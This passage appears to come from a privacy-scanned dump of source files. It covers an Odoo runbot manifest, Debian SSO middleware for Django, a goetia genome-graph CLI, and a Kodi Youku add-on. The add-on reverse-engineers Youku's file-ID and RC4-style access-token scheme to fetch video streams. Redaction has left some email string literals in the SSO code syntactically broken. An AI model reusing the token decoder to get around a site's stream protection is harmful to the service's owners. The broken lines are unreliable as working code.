'tests.integration.fi'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'mock.Ma'], ['URL', '.now.re'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'meta.random.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'mock.Ma'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'mock.Ma'], ['URL', 'asyncio.co'], ['URL', 'corofunc.co'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'patch.re'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.ca'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.re'], ['URL', 'client.ge'], ['URL', 'client.ge'], ['URL', 'patch.si'], ['URL', 'client.ge'], ['URL', 'client.ge']] |
36 | # -*- encoding: utf-8 -*-
#
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2014 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo (dummy@email.com)
#
# Coded by: Vauxoo (dummy@email.com)
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
{
'name': 'Runbot sync remote info',
'category': 'Website',
'summary': 'Runbot',
'version': '1.0',
'description': """This module create a connection with
remote host of git to sync information.
e.g. Status of pull request
e.g. name source branch of a pull request""",
'author': 'Vauxoo',
'depends': ['runbot'],
'external_dependencies': {
},
'data': [
'data/ir_cron_data.xml',
'view/runbot_view.xml',
],
'installable': True,
}
| 1,491 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Runbot'], ['PERSON', 'Runbot'], ['PERSON', 'runbot'], ['URL', 'http://www.vauxoo.com/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com']] |
37 | # Copyright 2013 The Distro Tracker Developers
# See the COPYRIGHT file at the top-level directory of this distribution and
# at http://deb.li/DTAuthors
#
# This file is part of Distro Tracker. It is subject to the license terms
# in the LICENSE file found in the top-level directory of this
# distribution and at http://deb.li/DTLicense. No part of Distro Tracker,
# including this file, may be copied, modified, propagated, or distributed
# except according to the terms contained in the LICENSE file.
from __future__ import unicode_literals
from django.contrib.auth.middleware import RemoteUserMiddleware
from django.contrib.auth.backends import RemoteUserBackend
from django.contrib import auth
from pts.accounts.models import UserEmail
from pts.core.utils import get_or_none
from pts.accounts.models import User
import ldap
class DebianSsoUserMiddleware(RemoteUserMiddleware):
"""
Middleware that initiates user authentication based on the REMOTE_USER
field provided by Debian's SSO system.
If the currently logged in user is a DD (as identified by having a @debian.org
address), he is forcefully logged out if the header is no longer found or is
invalid.
"""
header = 'REMOTE_USER'
def extract_email(self, username):
parts = [part for part in username.split(':') if part]
federation, jurisdiction = parts[:2]
if (federation, jurisdiction) != ('DEBIANORG', 'DEBIAN'):
return
return parts[-1] + dummy@email.com'
def is_debian_user(self, user):
return any(
email.email.endswith(dummy@email.com')
for email in user.emails.all()
)
def log_out_user(self, request):
if request.user.is_authenticated():
if self.is_debian_user(request.user):
auth.logout(request)
def process_request(self, request):
if self.header not in request.META:
# If a user is logged in to the PTS by Debian SSO, sign him out
self.log_out_user(request)
return
username = request.META[self.header]
if not username:
self.log_out_user(request)
return
email = self.extract_email(username)
if request.user.is_authenticated():
if request.user.emails.filter(email=email).exists():
# The currently logged in user matches the one given by the
# headers.
return
user = auth.authenticate(remote_user=email)
if user:
request.user = user
auth.login(request, user)
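# For reference, the SSO header value has the form 'DEBIANORG:DEBIAN:<uid>'
# ('jdoe' below is an illustrative uid, not from the source):
#
#     extract_email('DEBIANORG:DEBIAN:jdoe')  # -> 'jdoe' + the Debian domain
#
# i.e. extract_email() keeps only the trailing uid and appends the (redacted)
# mail domain seen above.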
class DebianSsoUserBackend(RemoteUserBackend):
"""
The authentication backend which authenticates the provided remote user
    (identified by their @debian.org email) in the PTS. If a matching User
    model instance does not exist, one is automatically created. In that case
    the DD's first and last name are pulled from Debian's LDAP.
"""
def authenticate(self, remote_user):
if not remote_user:
return
email = remote_user
email_user = get_or_none(UserEmail, email=email)
if not email_user:
names = self.get_user_details(remote_user)
kwargs = {}
if names:
kwargs.update(names)
user = User.objects.create_user(main_email=email, **kwargs)
else:
user = email_user.user
return user
def get_uid(self, remote_user):
# Strips off the @debian.org part of the email leaving the uid
return remote_user[:-11]
def get_user_details(self, remote_user):
"""
Gets the details of the given user from the Debian LDAP.
        :return: Dict with the keys ``first_name`` and ``last_name``, or
            ``None`` if the LDAP lookup did not return anything.
"""
l = ldap.initialize('ldap://db.debian.org')
result_set = l.search_s(
'dc=debian,dc=org',
ldap.SCOPE_SUBTREE,
'uid={}'.format(self.get_uid(remote_user)),
None)
if not result_set:
return None
result = result_set[0]
return {
'first_name': result[1]['cn'][0].decode('utf-8'),
'last_name': result[1]['sn'][0].decode('utf-8'),
}
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
| 4,455 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2013'], ['PERSON', 'ldap'], ['PERSON', 'REMOTE_USER'], ['LOCATION', 'remote_user'], ['LOCATION', 'remote_user'], ['PERSON', 'remote_user'], ['PERSON', "dc=org'"], ['LOCATION', 'ldap'], ['URL', 'http://deb.li/DTAuthors'], ['URL', 'http://deb.li/DTLicense.'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.auth.ba'], ['URL', 'django.co'], ['URL', 'pts.accounts.mo'], ['URL', 'pts.co'], ['URL', 'pts.accounts.mo'], ['URL', 'debian.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'user.emails.al'], ['URL', 'request.user.is'], ['URL', 'self.is'], ['URL', 'request.us'], ['URL', 'request.ME'], ['URL', 'request.ME'], ['URL', 'request.user.is'], ['URL', 'request.user.emails.fi'], ['URL', 'auth.au'], ['URL', 'request.us'], ['URL', 'debian.org'], ['URL', 'self.ge'], ['URL', 'User.objects.cr'], ['URL', 'user.us'], ['URL', 'debian.org'], ['URL', 'ldap.in'], ['URL', 'db.debian.org'], ['URL', 'l.se'], ['URL', 'ldap.SC'], ['URL', 'self.ge'], ['URL', 'User.objects.ge'], ['URL', 'User.Do']] |
38 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# (c) Camille Scott, 2019
# File : cdbg_stream.py
# License: MIT
# Author : Camille Scott dummy@email.com
# Date : 11.03.2020
from goetia import libgoetia
from goetia.cdbg import (compute_connected_component_callback,
compute_unitig_fragmentation_callback,
write_cdbg_metrics_callback,
write_cdbg_callback)
from goetia.dbg import get_graph_args, process_graph_args
from goetia.parsing import get_fastx_args, iter_fastx_inputs
from goetia.processors import AsyncSequenceProcessor, at_modulo_interval
from goetia.messages import (Interval, SampleStarted, SampleFinished, Error, AllMessages)
from goetia.metadata import CUR_TIME
from goetia.serialization import cDBGSerialization
from goetia.cli.args import get_output_interval_args, print_interval_settings
from goetia.cli.runner import CommandRunner
import curio
import os
import sys
class cDBGRunner(CommandRunner):
def __init__(self, parser):
get_graph_args(parser)
get_cdbg_args(parser)
get_output_interval_args(parser)
group = get_fastx_args(parser)
group.add_argument('-o', dest='output_filename', default='/dev/stdout')
group.add_argument('-i', '--inputs', dest='inputs', nargs='+', required=True)
parser.add_argument('--echo', default=None,
help='echo all events to the given file.')
parser.add_argument('--curio-monitor', default=False, action='store_true',
help='Run curio kernel monitor for async debugging.')
parser.add_argument('--verbose', default=False, action='store_true')
super().__init__(parser)
def postprocess_args(self, args):
process_graph_args(args)
process_cdbg_args(args)
def setup(self, args):
os.makedirs(args.results_dir, exist_ok=True)
self.dbg_t = args.graph_t
self.hasher = args.hasher_t(args.ksize)
self.storage = args.storage.build(*args.storage_args)
self.dbg = args.graph_t.build(self.storage, self.hasher)
self.cdbg_t = libgoetia.cdbg.cDBG[type(self.dbg)]
self.compactor_t = libgoetia.cdbg.StreamingCompactor[type(self.dbg)]
self.compactor = self.compactor_t.Compactor.build(self.dbg)
if args.normalize:
self.file_processor = self.compactor_t.NormalizingCompactor[FastxReader].build(self.compactor,
args.normalize,
args.interval)
else:
self.file_processor = self.compactor_t.Processor.build(self.compactor,
args.interval)
# Iterator over samples (pairs or singles, depending on pairing-mode)
sample_iter = iter_fastx_inputs(args.inputs, args.pairing_mode, names=args.names)
# AsyncSequenceProcessor does event management and callback for the FileProcessors
self.processor = AsyncSequenceProcessor(self.file_processor, sample_iter, args.echo)
# Subscribe a listener to the FileProcessor producer
self.worker_listener = self.processor.add_listener('worker_q', 'cdbg.consumer')
#
# Register callbacks for data outputs.
# Track a list of files that need to be closed with a ]
# when we're done.
#
self.to_close = []
if args.track_cdbg_metrics:
self.worker_listener.on_message(Interval,
write_cdbg_metrics_callback,
self.compactor,
args.track_cdbg_metrics,
args.verbose)
self.to_close.append(args.track_cdbg_metrics)
if args.track_unitig_bp:
if args.unitig_bp_bins is None:
bins = [args.ksize, 100, 200, 500, 1000]
else:
bins = args.unitig_bp_bins
self.worker_listener.on_message(Interval,
at_modulo_interval(compute_unitig_fragmentation_callback,
modulus=args.unitig_bp_tick),
self.cdbg_t,
self.compactor.cdbg,
args.track_unitig_bp,
bins,
verbose=args.verbose)
self.to_close.append(args.track_unitig_bp)
if args.track_cdbg_components:
self.worker_listener.on_message(Interval,
at_modulo_interval(compute_connected_component_callback,
modulus=args.cdbg_components_tick),
self.cdbg_t,
self.compactor.cdbg,
args.track_cdbg_components,
args.component_sample_size,
verbose=args.verbose)
self.to_close.append(args.track_cdbg_components)
if args.save_cdbg:
for cdbg_format in args.save_cdbg_format:
self.worker_listener.on_message(Interval,
at_modulo_interval(write_cdbg_callback,
modulus=args.cdbg_tick),
args.save_cdbg,
cdbg_format,
verbose=args.verbose)
self.worker_listener.on_message(SampleFinished,
write_cdbg_callback,
args.save_cdbg,
cdbg_format,
verbose=args.verbose)
# Close all files when done
async def close_files(msg, files):
for file_name in files:
async with curio.aopen(file_name, 'a') as fp:
await fp.write('\n]\n')
self.worker_listener.on_message(SampleFinished, close_files, self.to_close)
#
# Regular diagnostics output
#
def info_output(msg):
info = f'{msg.msg_type}: {getattr(msg, "state", "")}'\
f'\n\tSample: {msg.sample_name}'\
f'\n\tSequences: {msg.sequence}'\
f'\n\tk-mers: {msg.t}'
if msg.msg_type == 'Error':
info += f'\n\tError: {msg.error}'
print(info, file=sys.stderr)
self.worker_listener.on_message(AllMessages, info_output)
def execute(self, args):
curio.run(self.processor.start, with_monitor=args.curio_monitor)
def teardown(self):
pass
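# The runner is event-driven: AsyncSequenceProcessor publishes Interval,
# SampleStarted, SampleFinished and Error messages, and each on_message hook
# in setup() registers a callback on the 'worker_q' listener. Judging from
# its use above, at_modulo_interval wraps a callback so it only fires on
# every `modulus`-th Interval message, throttling the cdbg/component/unitig
# outputs.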
def get_cdbg_args(parser):
default_prefix = 'goetia.build-cdbg.' + CUR_TIME
parser.default_prefix = default_prefix
group = parser.add_argument_group('cDBG')
group.add_argument('--results-dir',
default=default_prefix)
group.add_argument('--normalize',
type=int,
nargs='?',
const=10)
group.add_argument('--save-cdbg',
metavar='PREFIX.<format>',
nargs='?',
const='goetia.cdbg.graph',
help='Save a copy of the cDBG.')
group.add_argument('--save-cdbg-format',
nargs='+',
choices=cDBGSerialization.FORMATS,
default=['gfa1'])
group.add_argument('--cdbg-tick',
type=int,
default=10,
help='Save every N interval ticks.')
group.add_argument('--track-cdbg-metrics',
metavar='FILE_NAME.json',
nargs='?',
const='goetia.cdbg.stats.json',
help='Output basic cDBG metrics.')
group.add_argument('--cdbg-metrics-tick',
type=int,
default=5,
help='Output every N interval ticks.')
group.add_argument('--track-cdbg-components',
metavar='FILE_NAME.json',
nargs='?',
const='goetia.cdbg.components.json',
help='Save the distribution of component sizes.')
group.add_argument('--component-sample-size',
type=int,
default=10000,
help='Number of components to sample for size.')
group.add_argument('--cdbg-components-tick',
type=int,
default=5,
help='Sample and save distribution every N interval ticks.')
group.add_argument('--track-unitig-bp',
metavar='FILENAME.json',
nargs='?',
const='goetia.cdbg.unitigs.bp.json',
help='Track the distribution of unitig sizes.')
group.add_argument('--unitig-bp-bins',
nargs='+',
type=int,
help='Bin sizes of distribution.')
group.add_argument('--unitig-bp-tick',
type=int,
default=10)
group.add_argument('--validate',
metavar='FILENAME.csv',
nargs='?',
const='goetia.cdbg.validation.csv')
return group
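# A hypothetical invocation wiring these options together (program name and
# paths are illustrative, not from the source):
#
#     cdbg_stream.py -i reads.fq --results-dir out/ \
#         --save-cdbg --save-cdbg-format gfa1 --track-cdbg-metrics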
def process_cdbg_args(args):
def join(p):
return p if p is None else os.path.join(args.results_dir, p)
args.track_cdbg_stats = join(args.track_cdbg_metrics)
args.track_cdbg_components = join(args.track_cdbg_components)
args.save_cdbg = join(args.save_cdbg)
args.track_cdbg_unitig_bp = join(args.track_unitig_bp)
def print_cdbg_args(args):
print('* cDBG Params', file=sys.stderr)
print('* Directory: ', args.results_dir, file=sys.stderr)
if args.save_cdbg:
print('* Saving cDBG every {0} sequences with file prefix {1}'.format(args.coarse_interval,
args.save_cdbg),
file=sys.stderr)
print('* cDBG save formats: {0}'.format(', '.join(args.save_cdbg_format)))
if args.track_cdbg_stats:
print('* Tracking cDBG stats and reporting every {0} sequences'.format(args.fine_interval),
file=sys.stderr)
print('* Saving tracking information to', args.track_cdbg_stats, file=sys.stderr)
if args.track_cdbg_history:
print('* Tracking cDBG history and saving to', args.track_cdbg_history, file=sys.stderr)
if args.validate:
print('* cDBG will be validated on completion and results saved to', args.validate,
file=sys.stderr)
print('*', '*' * 10, '*', sep='\n', file=sys.stderr)
| 11,564 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '11.03.2020'], ['PERSON', 'Camille Scott'], ['DATE_TIME', '2019'], ['PERSON', 'Camille Scott'], ['LOCATION', 'goetia.messages'], ['PERSON', 'get_fastx_args(parser'], ['PERSON', 'exist_ok=True'], ['LOCATION', 'sample_iter'], ['PERSON', 'self.to_close'], ['PERSON', 'with_monitor=args.curio_monitor'], ['PERSON', "const='goetia.cdbg.stats.json"], ['PERSON', "help='Output"], ['PERSON', "help='Output"], ['PERSON', "help='Bin"], ['PERSON', "const='goetia.cdbg.validation.csv"], ['LOCATION', 'join(args.track_unitig_bp'], ['URL', 'stream.py'], ['URL', 'email.com'], ['URL', 'goetia.cd'], ['URL', 'goetia.pa'], ['URL', 'goetia.pro'], ['URL', 'goetia.me'], ['URL', 'goetia.me'], ['URL', 'goetia.se'], ['URL', 'goetia.cli.ar'], ['URL', 'goetia.cli.ru'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ma'], ['URL', 'args.re'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'args.st'], ['URL', 'args.st'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'self.cd'], ['URL', 'libgoetia.cdbg.cD'], ['URL', 'self.com'], ['URL', 'libgoetia.cdbg.St'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 't.Com'], ['URL', 'args.no'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.No'], ['URL', 'self.com'], ['URL', 'args.no'], ['URL', 'args.int'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.Pro'], ['URL', 'self.com'], ['URL', 'args.int'], ['URL', 'args.in'], ['URL', 'args.pa'], ['URL', 'args.na'], ['URL', 'self.pro'], ['URL', 'self.fi'], ['URL', 'args.ec'], ['URL', 'self.processor.ad'], ['URL', 'cdbg.co'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'self.com'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.cd'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.com'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.cd'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'curio.ao'], ['URL', 'self.to'], ['URL', 'msg.ms'], ['URL', 'msg.sa'], ['URL', 'msg.se'], ['URL', 'msg.ms'], ['URL', 'msg.er'], ['URL', 'sys.st'], ['URL', 'curio.ru'], ['URL', 'self.processor.st'], ['URL', 'args.cu'], ['URL', 'parser.de'], ['URL', 'parser.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.gr'], ['URL', 'group.ad'], ['URL', 'cDBGSerialization.FO'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.st'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.com'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cd'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.va'], ['URL', 'os.path.jo'], ['URL', 'args.re'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.re'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.co'], ['URL', 'args.sa'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.fi'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.va'], ['URL', 
'args.va'], ['URL', 'sys.st'], ['URL', 'sys.st']] |
39 | # -*- coding: utf-8 -*-
import xbmc, xbmcgui, xbmcplugin, xbmcaddon, urllib2, urllib, re, string, sys, os, gzip, StringIO, math, urlparse
import base64, time, cookielib
import simplejson
# Plugin constants
__addon__ = xbmcaddon.Addon()
__addonname__ = __addon__.getAddonInfo('name')
__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8")
UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
ORDER_LIST1 = [['1','最多播放'], ['2','最多评论'], ['4','最受欢迎'], ['5','最近上映'], ['6','最近更新']]
DAYS_LIST1 = [['1','今日'], ['2','本周'], ['4','历史']]
ORDER_LIST2 = [['1','最多播放'], ['2','最新发布'], ['3','最多评论'], ['4','最多收藏'], ['5','最受欢迎']]
DAYS_LIST2 = [['1','今日'], ['2','本周'], ['3','本月'], ['4','历史']]
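# English glosses of the Chinese labels above (for reference): ORDER_LIST1 is
# most played / most commented / most popular / recently released / recently
# updated; ORDER_LIST2 is most played / newest releases / most commented /
# most favorited / most popular. DAYS_LIST1/2 cover today / this week /
# (this month) / all time.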
class youkuDecoder:
def __init__( self ):
return
def getFileIDMixString(self,seed):
mixed = []
source = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\:._-1234567890")
seed = float(seed)
for i in range(len(source)):
seed = (seed * 211 + 30031 ) % 65536
index = math.floor(seed /65536 *len(source))
mixed.append(source[int(index)])
source.remove(source[int(index)])
return mixed
def getFileId(self,fileId,seed):
mixed = self.getFileIDMixString(seed)
ids = fileId.split('*')
realId = []
for i in range(0,len(ids)-1):
realId.append(mixed[int(ids[i])])
return ''.join(realId)
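    # In short: the numeric seed drives the LCG above (seed = (seed*211 +
    # 30031) % 65536) to shuffle the alphabet, and a fileId of the form
    # '12*5*63*...' is decoded by indexing each '*'-separated number into
    # that shuffled alphabet.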
def trans_e(self, a, c):
b = range(256)
f = 0
result = ''
h = 0
while h < 256:
f = (f + b[h] + ord(a[h % len(a)])) % 256
b[h], b[f] = b[f], b[h]
h += 1
q = f = h = 0
while q < len(c):
h = (h + 1) % 256
f = (f + b[h]) % 256
b[h], b[f] = b[f], b[h]
result += chr(ord(c[q]) ^ b[(b[h] + b[f]) % 256])
q += 1
return result
def trans_f(self, a, c):
"""
:argument a: list
:param c:
:return:
"""
b = []
for f in range(len(a)):
i = ord(a[f][0]) - 97 if "a" <= a[f] <= "z" else int(a[f]) + 26
e = 0
while e < 36:
if c[e] == i:
i = e
break
e += 1
v = i - 26 if i > 25 else chr(i + 97)
b.append(str(v))
return ''.join(b)
f_code_1 = 'becaf9be'
f_code_2 = 'bf7e5f01'
def _calc_ep(self, sid, fileId, token):
ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, fileId, token))
return base64.b64encode(ep)
def _calc_ep2(self, vid, ep):
e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))
sid, token = e_code.split('_')
new_ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, vid, token))
return base64.b64encode(new_ep), token, sid
def get_sid(self, ep):
e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))
return e_code.split('_')
def generate_ep(self, no, fileid, sid, token):
ep = urllib.quote(self._calc_ep(sid, fileid, token).encode('latin1'),
safe="~()*!.'"
)
return ep
def log(txt):
message = '%s: %s' % (__addonname__, txt)
xbmc.log(msg=message, level=xbmc.LOGDEBUG)
def GetHttpData(url, referer=''):
log("%s::url - %s" % (sys._getframe().f_code.co_name, url))
req = urllib2.Request(url)
req.add_header('User-Agent', UserAgent)
if referer:
req.add_header('Referer', referer)
try:
response = urllib2.urlopen(req)
httpdata = response.read()
if response.headers.get('content-encoding', None) == 'gzip':
httpdata = gzip.GzipFile(fileobj=StringIO.StringIO(httpdata)).read()
charset = response.headers.getparam('charset')
response.close()
except:
log( "%s (%d) [%s]" % (
sys.exc_info()[2].tb_frame.f_code.co_name,
sys.exc_info()[2].tb_lineno,
sys.exc_info()[1]
))
return ''
match = re.compile('<meta http-equiv=["]?[Cc]ontent-[Tt]ype["]? content="text/html;[\s]?charset=(.+?)"').findall(httpdata)
if match:
charset = match[0]
else:
match = re.compile('<meta charset="(.+?)"').findall(httpdata)
if match:
charset = match[0]
if charset:
charset = charset.lower()
if (charset != 'utf-8') and (charset != 'utf8'):
httpdata = httpdata.decode(charset, 'ignore').encode('utf8', 'ignore')
return httpdata
def searchDict(dlist,idx):
for i in range(0,len(dlist)):
if dlist[i][0] == idx:
return dlist[i][1]
return ''
def getCurrent(text,list,id):
match = re.compile('<li class="current"\s*><span>(.+?)</span>').search(text)
if match:
list.append([id, match.group(1)])
def getList(listpage,id,genre,area,year):
if id == 'c_95':
str1 = '风格:'
str3a = '发行:'
str3b = 'r'
elif id == 'c_84' or id == 'c_87':
str1 = '类型:'
str3a = '出品:'
str3b = 'pr'
else:
str1 = '类型:'
str3a = '时间:'
str3b = 'r'
match = re.compile('<label>%s</label>(.+?)</ul>' % (str1), re.DOTALL).search(listpage)
genrelist = re.compile('_g_([^_\.]*)[^>]*>([^<]+)</a>').findall(match.group(1))
getCurrent(match.group(1), genrelist, genre)
if id == 'c_84' or id == 'c_87':
arealist = []
else:
match = re.compile('<label>地区:</label>(.+?)</ul>', re.DOTALL).search(listpage)
arealist = re.compile('_a_([^_\.]*)[^>]*>([^<]+)</a>').findall(match.group(1))
getCurrent(match.group(1), arealist, area)
match = re.compile('<label>%s</label>(.+?)</ul>' % (str3a), re.DOTALL).search(listpage)
yearlist = re.compile('_%s_([^_\.]*)[^>]*>([^<]+)</a>' % (str3b)).findall(match.group(1))
getCurrent(match.group(1), yearlist, year)
return genrelist,arealist,yearlist
def getList2(listpage,genre):
match = re.compile('<label>类型:</label>(.+?)</ul>', re.DOTALL).search(listpage)
if match:
genrelist = re.compile('<li><a href=".*?/category/video/[^g]*g_([0-9]+)[^\.]*\.html"[^>]*>(.+?)</a></li>').findall(match.group(1))
getCurrent(match.group(1), genrelist, genre)
else:
genrelist = []
return genrelist
def rootList():
link = GetHttpData('http://list.youku.com/')
match0 = re.compile('<label>分类:</label>(.+?)</ul>', re.DOTALL).search(link)
match = re.compile('<li><a\s*href="/category/([^/]+)/([^\.]+)\.html">(.+?)</a></li>', re.DOTALL).findall(match0.group(1))
totalItems = len(match)
for path, id, name in match:
if path == 'show':
u = sys.argv[0]+"?mode=1&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre=&area=&year=&order=1&days=1&page=1"
else:
u = sys.argv[0]+"?mode=11&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre=0&year=1&order=1&days=1&page=1"
li = xbmcgui.ListItem(name)
xbmcplugin.addDirectoryItem(int(sys.argv[1]),u,li,True,totalItems)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def progList(name,id,page,genre,area,year,order,days):
url = 'http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html' % (id, genre, area, order, days, year, page)
link = GetHttpData(url)
match = re.compile('<ul class="yk-pages">(.+?)</ul>', re.DOTALL).search(link)
plist = []
if match:
match1 = re.compile('<li.+?>([0-9]+)(</a>|</span>)</li>', re.DOTALL).findall(match.group(1))
if match1:
for num, temp in match1:
if (num not in plist) and (num != page):
plist.append(num)
totalpages = int(match1[len(match1)-1][0])
else:
totalpages = 1
match = re.compile('<div class="yk-filter" id="filter">(.+?)<div class="yk-filter-handle">', re.DOTALL).search(link)
if match:
listpage = match.group(1)
else:
listpage = ''
if id == 'c_95':
match = re.compile('<div class="yk-pack p-list"(.+?)</ul></div>', re.DOTALL).findall(link)
else:
match = re.compile('<div class="yk-pack pack-film">(.+?)</ul></div>', re.DOTALL).findall(link)
totalItems = len(match) + 1 + len(plist)
currpage = int(page)
genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)
if genre:
genrestr = searchDict(genrelist,genre)
else:
genrestr = '全部类型'
if area:
areastr = searchDict(arealist,area)
else:
areastr = '全部地区'
if year:
yearstr = searchDict(yearlist,year)
else:
if id == 'c_84' or id == 'c_87':
yearstr = '全部出品'
else:
yearstr = '全部年份'
li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + areastr + '[/COLOR]/[COLOR FFFFFF00]' + yearstr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST1,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST1,order) + '[/COLOR]】(按此选择)')
u = sys.argv[0]+"?mode=4&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&area="+urllib.quote_plus(area)+"&year="+urllib.quote_plus(year)+"&order="+order+"&days="+days+"&page="+urllib.quote_plus(listpage)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
for i in range(0,len(match)):
if id in ('c_96','c_95'):
mode = 2
isdir = False
else:
mode = 3
isdir = True
match1 = re.compile('/id_(.+?).html"').search(match[i])
p_id = match1.group(1)
match1 = re.compile('<img class="quic".*?src="(.+?)"').search(match[i])
p_thumb = match1.group(1)
match1 = re.compile('<li class="title"><a .*?">(.+?)</a>').search(match[i])
p_name = match1.group(1)
match1 = re.compile('<li class="status hover-hide"><span .*?<span>(.+?)</span>').search(match[i])
if match1:
p_name1 = p_name + '(' + match1.group(1) + ')'
else:
p_name1 = p_name
match1 = re.compile('<span class="vip-free">(.+?)</span>').search(match[i])
if match1:
p_name1 = p_name1 + '[' + match1.group(1) + ']'
li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+"?mode="+str(mode)+"&name="+urllib.quote_plus(p_name)+"&id="+urllib.quote_plus(p_id)+"&thumb="+urllib.quote_plus(p_thumb)
#li.setInfo(type = "Video", infoLabels = {"Title":p_name, "Director":p_director, "Genre":p_genre, "Plot":p_plot, "Year":p_year, "Cast":p_cast, "Tagline":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, isdir, totalItems)
for num in plist:
li = xbmcgui.ListItem("... 第" + num + "页")
u = sys.argv[0]+"?mode=1&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&area="+urllib.quote_plus(area)+"&year="+year+"&order="+order+"&days="+days+"&page="+str(num)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
